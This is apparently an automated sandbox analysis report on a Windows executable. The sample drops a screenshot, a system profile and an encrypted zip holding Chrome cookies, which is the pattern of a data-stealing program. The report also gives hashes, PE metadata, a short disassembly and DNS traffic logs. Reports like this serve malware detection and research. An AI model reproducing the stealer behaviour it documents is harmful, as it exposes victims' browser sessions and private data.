File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\screenshot.jpg Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	78831
Entropy (8bit):	7.847850529153669
Encrypted:	false
SSDEEP:	1536:IcAB4J5qfo2hlbsuveVJif3uiicy74xXSdNSnJ55d4U7JK:1Ao5qg7OfexcyBdNi3Lt7JK
MD5:	F389B7CB3170C577214F0674A6FAD6D9
SHA1:	FC1ABCF8252A6DFB8493F08C495D88639960703E
SHA-256:	2F0FD80B1057549F47F3A27C1C2DAE1B230C4A9C5C71F81C6D24FC559DDD6242
SHA-512:	9C4C740423336897488156EE014E755F446EE7CC3A5FB263027D5F1CDBA16BF211DC0B98B7A85B42709320A7D3F6A73012DDD2421553B3DFD3BEB925961E80C8
Malicious:	false
Preview:	......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~....:-.\|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.\|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%..../....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z.........

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\system_info.txt Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	20462
Entropy (8bit):	3.5211663508533486
Encrypted:	false
SSDEEP:	384:Dq8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1Faob:DOOpR2J0eDcDDfZmEiv5bJtWmGu37mxw
MD5:	875AD312B785EF11D73066B85DBA49CD
SHA1:	1E6E26CE75CE9D66448E3C339C054ABB18DA56BE
SHA-256:	06008DED2AD0A3311698E1DE2D371F2C475A7EB02D120168D15C1E18B19CF106
SHA-512:	6CD26F5514CBCACE3203AA569B400492FF1CCFE85AEBC1CBAD6CF21A6B6295B6F7B28111FF3F9807AEDF42532079F30F466B43F13CBFA27D136F807EC5722BA3
Malicious:	false
Preview:	..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.D.e.s.k.t.o.p.\.f.i.l.e...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .\|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.1.0.-.1.3. .0.4.:.4.1.:.0.8.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .+.0.2.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .j.o.n.e.s. .(.2.8.4.9.9.2.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .A.M.D. .(.A.T.I.). . .F.i.r.

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\tNdQlntdrTxEwt.zip Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	80867
Entropy (8bit):	7.9957283100170224
Encrypted:	true
SSDEEP:	1536:ibCC8yErmu2qlHHMdw3kt6sq+RDAYZJsg32AUSh:OmyEau2qZMkz8cSh3mw
MD5:	470E7138C9C8FB931183D340A0D92BDE
SHA1:	423CB343F6CF3BF452A44C435AE9151B76C6BBA3
SHA-256:	E832A236BA8E8B7F74A6F0824F5623F231F9EE226AC248589CD2DE5ECDF4573D
SHA-512:	9180C7FEFC4BCCD7014483AB9C3558FFA85E91A117AB005E90C7EF1BDDB6D763B7E4066EAAC2A7F31DE12AF55648026C2D6222C63F40206C74103BA6DC78BA3F
Malicious:	false
Preview:	PK.........;>Q.........P......_Chrome/default_cookies.dbUT....3t_s4fas4fa.p...N.ZM.(IjZ.X.[6.@.yc..X...Mx..y...GoD..q.+.5.qS...../cp.=..gy..pJ.+.{.hs9..K..t.y.J...D?wO...x.PpXu..........b+.rr..)..U..<.W.FRC.?0...w..5[...pv..O.[.......~y.?..@.q.gIRu.....H..x.'...(:.B."..B_..T.`...x.N.$kOs..&IC.~....^..v.....]...u.....p..P.......Te.#eyl...>.l.B.+.:....>..RFOk...<n....C>..L...n....s...p.Mn....w.....g..%..F...%..\|?e...=u.E$...wx.0.....>...H.J.t..T...Qs..fs.8..v.i+~..z.u(..8y..&.Q.2"a....'.;......."....`.N.%.g.oVs.../2..hhi.^..9...q.TF..h%.^.2o..G.`:.....N..._]....&$..z?P..bO0 ..Y.=.<..AW..3.r..Dp.P;rqu...{.<.....%.LX_.........l..iY.:......u ,$52S....}HJ..g.g?.[/s....)....k.L8......t.R...b.d.......14w...3.-..g..Kt.D...^....xY.... .J.yBG.......'.$..~...\|.vM..J...Y.bl..9.e..d..I..D.x.K.")..I...u..xd/M.)e....r.A.....l.9...2._5... ..\'Als.[K4........L.o(..k.-&`..q.$.. ...E..e\...../...Z\|......N.6.I{<..!.arhJ..;...>Zp...<......C'..C%.u'..0lR. k..~.Y

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.549254081960864
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	433664
MD5:	6738381ddd3d2952312af2a0f2be5157
SHA1:	40fa53df583e9b598bb2d7be716958b1f5bad0dc
SHA256:	84f4e2b346b6f5473e2c564a6f60985c5d20f621e70a982e9aafd21354ccc66f
SHA512:	cf9e7f0ce2a58717d2a46983c75bfffb2ea102ec47d6a8a9c0bd609dd232b5a985918b4faa252bddccfd5197eab0c0fc5aa7e5aaa9c8bc1c6e87e05d98926ed9
SSDEEP:	12288:fnp8alT211jBY5nqtMIfHC3XFySjwL4lJELjgChvMN:fp322RIfHqESj7N0M
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L...J.._...........

File Icon


Icon Hash:	9066e198e6673142

Static PE Info

General
Entrypoint:	0x433280
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F12B24A [Sat Jul 18 08:26:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	596565906d53e0788494497e755c2e29

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F9440A51D7Bh
call 00007F9440A4B4D6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 00451380h
push 00437600h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00453094h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401118h]
cmp dword ptr [016C4D4Ch], 00000000h
jne 00007F9440A4B4D0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401114h]
call 00007F9440A4B653h
mov dword ptr [ebp-6Ch], eax
call 00007F9440A52CABh
test eax, eax
jne 00007F9440A4B4CCh
push 0000001Ch
call 00007F9440A4B610h
add esp, 04h
call 00007F9440A4FA38h
test eax, eax
jne 00007F9440A4B4CCh
push 00000010h
call 00007F9440A4B5FDh
add esp, 04h
push 00000001h
call 00007F9440A4F763h
add esp, 04h
call 00007F9440A52C1Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F9440A527FFh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x51eb4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12c6000	0x7308	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12ce000	0x1c7c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1230	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2f190	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x519b4	0x51a00	False	0.694319486983	data	7.34053606656	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x53000	0x1272d50	0x1c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12c6000	0x7308	0x7400	False	0.417362607759	data	4.44908718493	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12ce000	0xeeee	0xf000	False	0.101676432292	data	1.28829968487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x12c62b0	0xea8	data	English	United States
RT_ICON	0x12c7158	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 12048293, next used block 8159857	English	United States
RT_ICON	0x12c7a00	0x6c8	data	English	United States
RT_ICON	0x12c80c8	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x12c8630	0x25a8	data	English	United States
RT_ICON	0x12cabd8	0x10a8	data	English	United States
RT_ICON	0x12cbc80	0x988	data	English	United States
RT_ICON	0x12cc608	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0x12ccc18	0x6ac	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x12cd2c8	0x3e	AmigaOS bitmap font	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x12cca70	0x76	data	English	United States
RT_VERSION	0x12ccae8	0x130	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL

Import

KERNEL32.dll

UnregisterWait, FindFirstChangeNotificationW, InterlockedDecrement, CompareFileTime, SetFirmwareEnvironmentVariableA, GetSystemWindowsDirectoryW, AddConsoleAliasW, FlushViewOfFile, GetPrivateProfileStringW, GetSystemWow64DirectoryA, CreateActCtxW, GetSystemTimes, GetDriveTypeA, LoadLibraryW, _hread, SetSystemTimeAdjustment, GetVersionExW, VerifyVersionInfoA, GetModuleFileNameW, GetEnvironmentVariableA, lstrlenW, SetThreadPriority, GetStartupInfoA, IsDBCSLeadByteEx, GetCurrentDirectoryW, GetLongPathNameW, SetLastError, GetProcAddress, SetVolumeLabelW, CreateTimerQueueTimer, GetConsoleDisplayMode, SearchPathA, OpenMutexA, ProcessIdToSessionId, LocalAlloc, IsSystemResumeAutomatic, AddAtomW, SetCurrentDirectoryW, SetFileApisToANSI, WriteProfileSectionW, AddAtomA, HeapWalk, FindAtomA, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, GetProcessShutdownParameters, QueryMemoryResourceNotification, FreeEnvironmentStringsW, VirtualProtect, CompareStringA, OutputDebugStringA, GetCPInfoExA, DeleteFileA, CloseHandle, CreateFileW, InterlockedIncrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, DecodePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, GetModuleHandleW, ExitProcess, GetLastError, WriteFile, GetStdHandle, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, HeapValidate, IsBadReadPtr, TlsAlloc, TlsGetValue, TlsSetValue, GetCurrentThreadId, TlsFree, WriteConsoleW, GetFileType, OutputDebugStringW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, HeapCreate, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, RtlUnwind, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, MultiByteToWideChar, LCMapStringW, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, SetStdHandle, FlushFileBuffers

USER32.dll

GetMessageTime

Version Infos

Description	Data
Translation	0x0150 0x0468

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
10/13/21-03:21:02.389161	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:07.457891	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:12.695170	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:14.200415	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:14.984804	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:19.954612	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:21.183279	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:22.913073	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:28.288693	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:30.426520	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:31.997254	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:37.881751	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:39.010380	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:43.851296	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:45.854525	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:50.210955	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:52.137066	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:21:56.197744	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:00.995929	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:05.278378	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:10.380976	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:11.515795	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:13.811274	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:19.217307	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:24.750132	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:30.705504	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:32.411972	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:34.170781	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:39.874576	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:41.081108	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:42.795458	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:45.078603	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:46.003920	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:49.749987	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8
10/13/21-03:22:54.398039	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.4	8.8.8.8

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 03:21:00.244450092 CEST	49257	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:01.308037996 CEST	49257	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:01.583400011 CEST	53	49257	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:02.389056921 CEST	53	49257	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:04.875261068 CEST	62389	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:05.885540009 CEST	62389	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:05.974519968 CEST	53	62389	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:07.457341909 CEST	53	62389	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:10.324683905 CEST	49910	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:11.339392900 CEST	49910	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:11.700870991 CEST	53	49910	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:11.837393045 CEST	55854	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:12.694979906 CEST	53	49910	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:12.839085102 CEST	55854	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:13.886396885 CEST	55854	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:13.898669958 CEST	53	55854	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:14.200314045 CEST	53	55854	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:14.984724045 CEST	53	55854	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:17.879841089 CEST	63153	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:18.886455059 CEST	63153	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:18.955882072 CEST	53	63153	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:19.066164017 CEST	52991	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:19.952100992 CEST	53	63153	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:20.106025934 CEST	52991	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:20.366436005 CEST	53	52991	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:20.515779972 CEST	53700	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:21.183137894 CEST	53	52991	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:21.544275999 CEST	53700	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:21.881818056 CEST	53	53700	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:22.912961960 CEST	53	53700	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:25.910090923 CEST	51726	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:26.934092045 CEST	51726	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:27.011250019 CEST	53	51726	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:27.128180981 CEST	56794	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:28.137290955 CEST	56794	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:28.199316978 CEST	53	56794	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:28.288079023 CEST	53	51726	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:28.338900089 CEST	56534	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:29.217339993 CEST	53	56794	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:29.341252089 CEST	56534	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:29.749722958 CEST	53	56534	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:29.861408949 CEST	56627	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:30.426400900 CEST	53	56534	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:30.903583050 CEST	56627	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:30.939423084 CEST	53	56627	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:31.997054100 CEST	53	56627	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:35.692908049 CEST	61721	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:36.700745106 CEST	61721	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:36.781883001 CEST	53	61721	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:36.926614046 CEST	55046	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:37.881616116 CEST	53	61721	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:37.936988115 CEST	55046	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:37.987848997 CEST	53	55046	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:39.009149075 CEST	53	55046	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:41.521255970 CEST	59172	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:42.544794083 CEST	59172	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:42.901144028 CEST	53	59172	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:43.019057989 CEST	62420	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:43.851013899 CEST	53	59172	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:44.060889006 CEST	62420	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:44.115537882 CEST	53	62420	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:45.854366064 CEST	53	62420	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:48.075043917 CEST	60579	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:49.092323065 CEST	60579	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:49.850893974 CEST	53	60579	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:49.974162102 CEST	50183	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:50.210850954 CEST	53	60579	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:51.030142069 CEST	50183	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:51.072808981 CEST	53	50183	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:52.136120081 CEST	53	50183	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:54.113473892 CEST	55916	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:55.124711037 CEST	55916	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:55.217227936 CEST	53	55916	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:56.197609901 CEST	53	55916	8.8.8.8	192.168.2.4
Oct 13, 2021 03:21:58.650206089 CEST	52752	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:59.686672926 CEST	52752	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:21:59.739356995 CEST	53	52752	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:00.993825912 CEST	53	52752	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:03.208611965 CEST	60542	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:04.203003883 CEST	60542	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:04.321183920 CEST	53	60542	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:05.278219938 CEST	53	60542	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:08.183978081 CEST	60689	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:09.187773943 CEST	60689	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:09.427354097 CEST	53	60689	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:09.558547974 CEST	64206	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:10.380769014 CEST	53	60689	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:10.594079018 CEST	64206	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:10.836510897 CEST	53	64206	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:10.961965084 CEST	50904	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:11.515616894 CEST	53	64206	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:12.000963926 CEST	50904	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:12.187814951 CEST	53	50904	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:13.810981989 CEST	53	50904	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:16.967132092 CEST	57525	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:17.969856024 CEST	57525	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:18.229638100 CEST	53	57525	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:19.216985941 CEST	53	57525	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:21.821299076 CEST	53814	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:22.959636927 CEST	53814	53	192.168.2.4	8.8.8.8
